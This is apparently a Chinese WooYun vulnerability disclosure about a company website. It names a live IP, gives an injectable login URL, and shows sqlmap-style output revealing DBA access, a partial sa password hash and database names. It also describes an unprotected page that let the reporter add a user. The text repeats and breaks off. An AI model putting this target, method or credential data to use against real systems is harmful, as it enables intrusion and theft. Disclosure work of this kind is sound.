### 简要描述: 晚上无聊,看看公司的网站有什么漏洞,哈哈,果然无意间又发现了一枚. 上一次提交公司的漏洞:http://www.wooyun.org/bugs/wooyun-2014-084920 为什么RANK一直没补啊,漏洞也不再我的列表下? @疯狗 @xsser ### 详细说明: 存在地址:http://125.35.5.234:81/ ping dbmservice.yonyou.com 感觉是很老的站点,于是乎,在登录账号的时候输入了',果不其然,发现有注入 构造下URL:http://125.35.5.234:81/checkuser.asp?loginname=admin&pwd=1 ``` [23:17:38] [INFO] fetching current user current user: 'sa' [23:17:38] [INFO] fetching current database current database: 'testdb' [23:17:38] [INFO] fetching server hostname hostname: 'XXTEST' [23:17:38] [INFO] testing if current user is DBA current user is DBA: True [23:17:39] [INFO] fetching database users [23:17:39] [INFO] the SQL query used returns 2 entries [23:17:39] [INFO] resumed: "BUILTIN\\\\Administrators" [23:17:39] [INFO] resumed: "sa" database management system users [2]: [*] BUILTIN\\Administrators [*] sa [23:17:39] [INFO] fetching database users password hashes [23:17:39] [INFO] the SQL query used returns 3 entries [23:17:39] [INFO] resumed: " "," " [23:17:39]...
### 简要描述: 晚上无聊,看看公司的网站有什么漏洞,哈哈,果然无意间又发现了一枚. 上一次提交公司的漏洞:http://www.wooyun.org/bugs/wooyun-2014-084920 为什么RANK一直没补啊,漏洞也不再我的列表下? @疯狗 @xsser ### 详细说明: 存在地址:http://125.35.5.234:81/ ping dbmservice.yonyou.com 感觉是很老的站点,于是乎,在登录账号的时候输入了',果不其然,发现有注入 构造下URL:http://125.35.5.234:81/checkuser.asp?loginname=admin&pwd=1 ``` [23:17:38] [INFO] fetching current user current user: 'sa' [23:17:38] [INFO] fetching current database current database: 'testdb' [23:17:38] [INFO] fetching server hostname hostname: 'XXTEST' [23:17:38] [INFO] testing if current user is DBA current user is DBA: True [23:17:39] [INFO] fetching database users [23:17:39] [INFO] the SQL query used returns 2 entries [23:17:39] [INFO] resumed: "BUILTIN\\\\Administrators" [23:17:39] [INFO] resumed: "sa" database management system users [2]: [*] BUILTIN\\Administrators [*] sa [23:17:39] [INFO] fetching database users password hashes [23:17:39] [INFO] the SQL query used returns 3 entries [23:17:39] [INFO] resumed: " "," " [23:17:39] [INFO] resumed: "BUILTIN\\\\Administrators"," " [23:17:39] [INFO] resumed: "sa","0x01008441bd0c06a1e0b894a678d3145108c3617bee... ``` DBA权限 列下库名: ``` [23:21:59] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2000 [23:21:59] [INFO] fetching database names [23:21:59] [INFO] the SQL query used returns 8 entries [23:21:59] [INFO] resumed: "master" [23:21:59] [INFO] resumed: "model" [23:21:59] [INFO] resumed: "msdb" [23:21:59] [INFO] resumed: "Northwind" [23:21:59] [INFO] resumed: "pubs" [23:21:59] [INFO] resumed: "tempdb" [23:21:59] [INFO] resumed: "testdb" [23:21:59] [INFO] resumed: "turbocrm" available databases [8]: [*] master [*] model [*] msdb [*] Northwind [*] pubs [*] tempdb [*] testdb [*] turbocrm ``` ### 漏洞证明: 再后面发现一个更鸡肋的事,突然发现有:http://125.35.5.234:81/main.asp 这个页面,随手添加了个用户1密码1,竟然直接登录进去了. 我勒个去去去去...
